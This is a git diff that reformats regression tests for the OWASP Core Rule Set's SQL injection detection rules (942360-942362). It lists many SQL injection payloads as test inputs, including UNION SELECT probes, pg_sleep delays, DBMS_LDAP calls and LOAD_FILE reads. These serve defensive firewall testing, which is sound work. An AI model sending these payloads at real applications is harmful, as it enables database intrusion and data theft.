port: 80 + uri: "/post" + data: " update" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 21 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "/select-quote" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-22 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "/select-quote" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 22 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: " Update: After..." - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-23 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: " Update: After..." + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 23 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "\"desc\"" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-24 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "\"desc\"" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 24 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/load.php" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-25 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/load.php" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 25 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/update-assets" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-26 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/update-assets" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 26 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "bla blabla live update chart" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-27 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "bla blabla live update chart" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 27 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ".select-gws-banana" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-28 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ".select-gws-banana" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 28 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "blablabla. As evidence from the following blablabla" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-29 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "blablabla. As evidence from the following blablabla" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 29 desc: GH issue 1816 - Known false positive stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "||(SELECT(DBMS_LDAP.INIT('169.1.1.1',19))FROM(DUAL))/investigate" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-30 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "||(SELECT(DBMS_LDAP.INIT('169.1.1.1',19))FROM(DUAL))/investigate" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 30 desc: GH issue 1816 - Known false positive stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "'||(select(pg_sleep(15))where(true))||'/investigate" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-31 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "'||(select(pg_sleep(15))where(true))||'/investigate" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 31 desc: GH issue 1816 - Known false positive stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qqkjq','mxTSrPILRz'),'qvxvq')-- sqCV" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-32 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qqkjq','mxTSrPILRz'),'qvxvq')-- sqCV" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 32 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "2020-03-01 UNION ALL SELECT CONCAT" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-33 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "2020-03-01 UNION ALL SELECT CONCAT" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 33 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "x\"; SELECT LOAD_FILE('" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-34 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "x\"; SELECT LOAD_FILE('" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 34 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "-1 UNION SELECT null,123456,null,null,null,null--" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-35 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "-1 UNION SELECT null,123456,null,null,null,null--" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 35 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "(CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6557=6557" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-36 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "(CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6557=6557" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 36 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-37 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 37 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version)" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-38 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version)" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 38 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "(SELECT 4440 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(4440=4440,1))),0x7170716271,FLOOR" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-39 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "(SELECT 4440 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(4440=4440,1))),0x7170716271,FLOOR" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 39 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "2759399466.1534185336 -6863 union all select 1,1,1,1,1,1,1,1,1,CONCAT" - version: HTTP/1.0 - output: - log_contains: id "942360" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "2759399466.1534185336 -6863 union all select 1,1,1,1,1,1,1,1,1,CONCAT" + version: HTTP/1.0 + output: + log_contains: id "942360" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml index 7c36f4b59..68532f40b 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml @@ -2,125 +2,116 @@ meta: author: "Christoph Hansen, azurit" description: None - enabled: true - name: 942361.yaml tests: - - test_title: 942361-1 + - test_id: 1 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "'alter a" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'alter a" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_id: 2 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\" ALTER A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\" ALTER A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_id: 3 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "'ALTER A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'ALTER A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_id: 4 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "' alter/" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "' alter/" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_id: 5 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\" UNION A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\" UNION A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_id: 6 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "'UNION A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'UNION A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_id: 7 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "' union/" - version: HTTP/1.0 - output: - log_contains: id "942361" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "' union/" + version: HTTP/1.0 + output: + log_contains: id "942361" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml index 97a2dc3f4..b3a51cc1b 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml @@ -2,551 +2,517 @@ meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler, azurit" description: None - enabled: true - name: 942362.yaml tests: - - test_title: 942362-1 + - test_id: 1 desc: "concatenated basic SQL injection and SQLLFI" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # 23423 as "sdfsdfs" FROM table - data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 2 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select Char(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select Char(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 3 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CHAR(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 4 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT GROUP_CONCAT(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 5 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT group_cOnCat(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 6 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as cc FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as cc FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 7 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS orders FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS orders FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 8 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS `carrier_id` from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS `carrier_id` from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 9 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select load_file(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select load_file(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 10 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - 